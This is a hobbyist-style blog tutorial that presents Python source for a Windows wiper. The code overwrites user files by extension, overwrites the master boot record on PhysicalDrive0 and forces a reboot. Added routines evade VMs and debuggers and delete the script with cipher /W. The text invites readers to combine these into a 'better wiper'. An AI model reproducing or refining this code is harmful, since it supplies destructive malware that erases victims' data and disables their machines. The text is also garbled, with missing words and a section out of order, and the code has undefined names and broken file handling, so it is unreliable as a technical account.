A wiper is a class of intended to (wipe, hence the name) the of the computer it infects, maliciously deleting data and programs.
Simply put, a wiper just straight up removes EVERYTHING on a system, thus "disabling" the system. I found awesome article by @ that I'll be using as my main reference for this. This malware works in 4 primary stages:
Destroy files content
Destroy MBR
Remove self
Shut it down!
Let's look at a simple python wiper. Assuming that you got a rootkit to pack with this sucker, here's a simple program to wipe all things off of a windows system:
import os
import subprocess
import ctypes
from ctypes import wintypes
import win32api
startupinfo = subprocess.STARTUPINFO() #type: ignore
drives = win32api.GetLogicalDriveStrings()
kernel32 = ctypes.WinDLL('kernel32')
def OverWriteMBR():
hDevice = Kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000, 0x00000001 | 0x00000002, None, 3, 0,0) # Create a handle to our Physical Drive
Kernel32.WriteFile(hDevice, Data, None) # Overwrite the MBR! (Never run this on your main machine!)
Kernel32.CloseHandle(hDevice) # Close the handle to our Physical Drive!
def SetFiles():
ext = [
".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z",
".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
".gif", ".txt", ".jar", ".sql", ".bundle",
".sqlite3", ".html", ".php", ".log", ".bak", ".deb"] # files to seek out and overwrite
for dirpath, dirs, files in os.walk(f"C:\\Users\\{os.getlogin()}\\{os.getcwd()}"):
for f in files:
path = os.path.abspath(os.path.join(dirpath, f))
if f.endswith(tuple(ext)):
with open(f, "rb") as files:
data = files.read()
files.close()
with open(f, "wb") as files:
data.write(b'\x00') # Overwrites multiple files with zero bytes (hex 00)
data.close()
def SysDown():
# InitiateSystemShutdown()
os.system("shutdown -t 0 -r -f ")
def main():
global application_path
if getattr(sys, 'frozen', False):
application_path = sys.executable
else:
application_path = os.path.dirname(os.path.abspath(__file__))
SetFiles()
OverWriteMBR()
if __name__ == "__main__":
main()
SysDown()
For example, you can add a checking mechanism that checks if the program is being run with elevated privileges:
def IsAdmin():
""" it checks if it has Administrator privileges, if it doesn't it runs itself using the ShellExecute trick and exits immediately
if it does, it performs the task at hand. """
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def AntiVm():
Process = ["vmsrvc.exe" , "vmusrvc.exe", "vboxtray.exe", "vmtoolsd.exe", "df5serv.exe", "vboxservice.exe"]
for process in psutil.process_iter():
for i in Process:
if i in process.name().lower():
return CommitSuicide()
def AntiDebug():
isDebuggerPresent = windll.kernel32.IsDebuggerPresent()
if (isDebuggerPresent):
return CommitSuicide()
def CommitSuicide():
file_path = os.path.abspath(__file__)
os.remove(file_path)
folder_path = os.path.dirname(file_path)
os.system("cipher /W:%s" % folder_path) # At the end of the script, the file is deleted & over-written
You can include calls to all this stuff in the main() function and you'll have an even better wiper! Alas, good wipers are far too complicated, and it's best if I leave it here. I'll try to make one such and put it up here in the future (no guarantees though!). Please feel free to reach out and ask about this stuff if you need to~
References
Simple as that! Run this as admin and it'll remove everything including the MBR. Neat right? Well, it's not very effective, but you can add a whole bunch of stuff to make it even better! (I'll once again be yoinking some code from the exalted @ 's skywiper repo...)